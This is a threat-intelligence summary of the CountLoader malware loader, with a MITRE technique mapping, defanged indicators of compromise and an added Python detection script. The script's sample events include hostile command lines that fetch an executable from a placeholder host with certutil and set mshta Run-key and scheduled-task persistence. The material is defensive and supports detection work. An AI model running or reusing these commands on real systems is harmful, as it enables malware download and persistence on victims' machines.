Silent Push discovered a new loader named CountLoader delivered in .NET, PowerShell, and JScript variants that fetches and executes secondary payloads (Cobalt Strike, Adaptix C2, PureHVNC, Lumma) and was used in a PDF phishing lure impersonating Ukrainian police. Technical artifacts and Cobalt Strike watermarks link CountLoader activity to ransomware clusters and possible IAB affiliates tied to LockBit, BlackBasta, and Qilin. #CountLoader #CobaltStrike #Adaptix #Lumma #LockBit #BlackBasta #Qilin
Keypoints
- CountLoader is a multi-language loader (JScript/.hta, .NET, PowerShell) observed delivering Cobalt Strike, Adaptix C2, PureHVNC, and Lumma Stealer.
- The JScript/.hta variant is the most feature-rich: extensive C2 loop, six download methods, three execution methods, domain-aware fingerprinting, and persistence via scheduled mshta tasks.
- CountLoader uses a robust C2 authentication/encryption scheme (XOR + Base64) and retrieves task lists (taskType-based) that enable downloading/executing EXEs, DLLs, MSI, and domain queries.
- Observed staging behavior favors the Windows Music folder for downloaded payloads and includes use of LOLBins (certutil, bitsadmin) and reflective in-memory execution paths.
- Analysis of embedded Cobalt Strike watermarks (e.g., 1473793097 and 1357776117) and shared infrastructure (domains/IPs, SSL fingerprints) links CountLoader activity to ransomware clusters and likely IAB or affiliate operations tied to LockBit, BlackBasta, and Qilin.
- Notable C2 domains and infrastructure include app-updater[.]app(s), ms-team-ping[.]com variants, misctoolsupdate[.]com, quasuar[.]com, and IPs such as 45.61.150[.]76 and 180.131.145[.]73.
- Silent Push recommends integrating IOFA™ feeds (CountLoader domains, Cobalt Strike/Adaptix/Lumma indicators) and initiating deeper investigations on detection due to evolving payloads and threat actor ties.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – CountLoader implements JScript, PowerShell, and .NET variants to execute tasks and download payloads (“…JScript-based version…wrapped in an HTML application…PowerShell version…20 lines…in-memory execution via reflective loading…”).
- [T1105] Ingress Tool Transfer – Downloader functionality uses multiple methods (curl, PowerShell, MSXML2.XMLHTTP, WinHTTP, bitsadmin, certutil) to fetch payloads (“…All tasks that download external software to execute make use of a function that attempts the download via up to six different methods…”).
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys – CountLoader sets a Run key value (HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDriver) that executes mshta pointing to the C2 (“…The malware then continues its execution by setting the Windows Run Key via…”).
- [T1053.005] Scheduled Task/Job: Scheduled Task – Creates a scheduled task whose name impersonates the Google updater and that runs mshta to maintain persistence (“…CountLoader creates a scheduled task…GoogleUpdaterTaskSystem135.0.7023.0…runs the ‘mshta’ executable pointing to ‘C2Server/env_Var…ten minutes after the initial execution.’”).
- [T1071] Application Layer Protocol – Uses HTTP(S) API endpoints (/api/getFile, /connect, /api/approveUpdate) with Bearer authentication for C2 communications (“…CountLoader connects using the ‘/connect’ endpoint…Authorization Bearer Header…”).
- [T1036.005] Masquerading: Match Legitimate Name or Location – Scheduled task names and User-Agent strings impersonate legitimate software and browsers (GoogleUpdaterTask, Yandex UA) to blend in (“…The task name attempts to impersonate Google’s update tasks…hardcoded User-Agent indicating a Yandex browser…”).
- [T1112] Modify Registry – Alters the Internet Explorer MaxScriptStatements registry value to suppress MSHTA warnings (“…changes the registry value for ‘MaxScriptStatements’ under ‘HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles’ to ‘10000000’.”).
- [T1005] Data from Local System – Collects hardware and environment identifiers (username, processor ID, system UUID, disk model/serial) to build a Victim ID and GUID used in C2 fingerprinting (“…Generate a Victim ID by ingesting different Hardware ID values…”).
- [T1496] Resource Hijacking/Proxying (domain fronting use) – Uses CloudFront domain fronting and multiple redirector domains to mask C2 infrastructure (“…domain fronting technique via CloudFront…d31tef3bsujkft.cloudfront.net/safebrowsing/…”).
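The persistence and staging behaviours listed above (Run key and scheduled task launching mshta from a URL, the raised MaxScriptStatements value, certutil/bitsadmin downloads into the Music folder) translate directly into endpoint detection logic. The following is an added example, not code from Silent Push or the original post: it applies those rules to constructed Sysmon-style telemetry records, with a placeholder C2 host (`c2.invalid`) standing in for the real infrastructure.

```python
import re

# Rule tags derived from the behaviours in the summary (technique IDs as the page maps them).
RUN_KEY_MSHTA = "T1547.001 Run key launches mshta from a URL"
IE_SCRIPT_LIMIT = "T1112 MaxScriptStatements raised to suppress mshta warnings"
TASK_MSHTA = "T1053.005 scheduled task launches mshta from a URL"
TASK_GOOGLE_NAME = "T1036.005 mshta task name mimics the Google updater"
LOLBIN_TO_MUSIC = "T1105 certutil/bitsadmin download into the Music folder"

MSHTA_URL = re.compile(r"\bmshta(?:\.exe)?\b\s+\S*https?://", re.I)
LOLBIN_DL = re.compile(r"\b(?:certutil|bitsadmin)(?:\.exe)?\b.*https?://.*\\Music\\", re.I)

# Constructed telemetry records (not real captures); c2.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"type": "registry_set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDriver",
     "data": "mshta https://c2.invalid/env_Var"},
    {"type": "registry_set", "key": r"HKCU\Software\Microsoft\Internet Explorer\Styles\MaxScriptStatements",
     "data": "10000000"},
    {"type": "task_create", "name": "GoogleUpdaterTaskSystem135.0.7023.0",
     "action": r"C:\Windows\System32\mshta.exe https://c2.invalid/env_Var"},
    {"type": "process_create", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -f https://c2.invalid/api/getFile?fn=x C:\Users\u\Music\twitter1.exe"},
    {"type": "task_create", "name": "GoogleUpdateTaskMachineUA",  # benign: real updater binary
     "action": r'"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua'},
    {"type": "process_create", "image": r"C:\Windows\System32\certutil.exe",  # benign: no download
     "cmdline": r"certutil -hashfile C:\tmp\a.iso SHA256"},
]

def classify(event):
    """Return the rule tags one event triggers; an empty list means nothing matched."""
    hits = []
    kind = event.get("type")
    if kind == "registry_set":
        key, data = event["key"].lower(), event["data"]
        if "\\currentversion\\run\\" in key and MSHTA_URL.search(data):
            hits.append(RUN_KEY_MSHTA)
        if key.endswith("\\internet explorer\\styles\\maxscriptstatements") and data.strip() == "10000000":
            hits.append(IE_SCRIPT_LIMIT)
    elif kind == "task_create" and MSHTA_URL.search(event["action"]):
        hits.append(TASK_MSHTA)
        # Name mimicry is only reported together with the mshta action, since a legitimate
        # Google updater also registers GoogleUpdaterTask* names.
        if event["name"].startswith("GoogleUpdaterTask"):
            hits.append(TASK_GOOGLE_NAME)
    elif kind == "process_create" and LOLBIN_DL.search(event["cmdline"]):
        hits.append(LOLBIN_TO_MUSIC)
    return hits

def hunt(events):
    """Map event index -> triggered tags for every event that matched at least one rule."""
    return {i: tags for i, e in enumerate(events) if (tags := classify(e))}

if __name__ == "__main__":
    for idx, tags in hunt(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["type"], tags)
```

Only the four constructed malicious records match; the two benign records (a genuine Google updater task and a certutil hash computation) pass through untouched.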
Indicators of Compromise
- [Domains] C2 and infrastructure domains associated with CountLoader and its payloads – app-updater[.]app, app-updater1[.]app (and app-updater2[.]app).
- [Domains] Ransomware/Cobalt Strike related domains – misctoolsupdate[.]com, quasuar[.]com, ms-team-ping2[.]com, grouptelecoms[.]com (and other sample domains listed).
- [IP Addresses] Cobalt Strike / infrastructure IPs – 45.61.150[.]76 (quasuar[.]com), 180.131.145[.]73 (misctoolsupdate[.]com) and 64[.]137[.]9[.]118 (payload-hosting C2 for Cobalt Strike/Adaptix).
- [File Hashes] Sample binaries and payload hashes – twitter1[.]exe SHA-256: 17bfe335b2f9037849fda87ae0a7909921a96d8abfafa8111dc5da63cbf11eda; Cobalt Strike sample file2[.]exe SHA-256: 233C777937F3B0F83B1F6AE47403E03D1C3F72F650B4C6AE3FACEC7F2E5DA4B5 (and 4 more payload hashes referenced).
- [Filenames] Lures and staged filenames – vymoha_na_yavku.zip (PDF lure impersonating Ukrainian police), twitter1[.]exe, svchost[.]exe, file2[.]exe.
- [URLs/Paths] API endpoints used by CountLoader – /api/getFile?fn= (shared pattern used across domains), /connect, /api/approveUpdate?id= (recovered from a decrypted endpoint string).
Read more: https://www.silentpush.com/blog/countloader/?utm_source=rss&utm_medium=rss&utm_campaign=countloader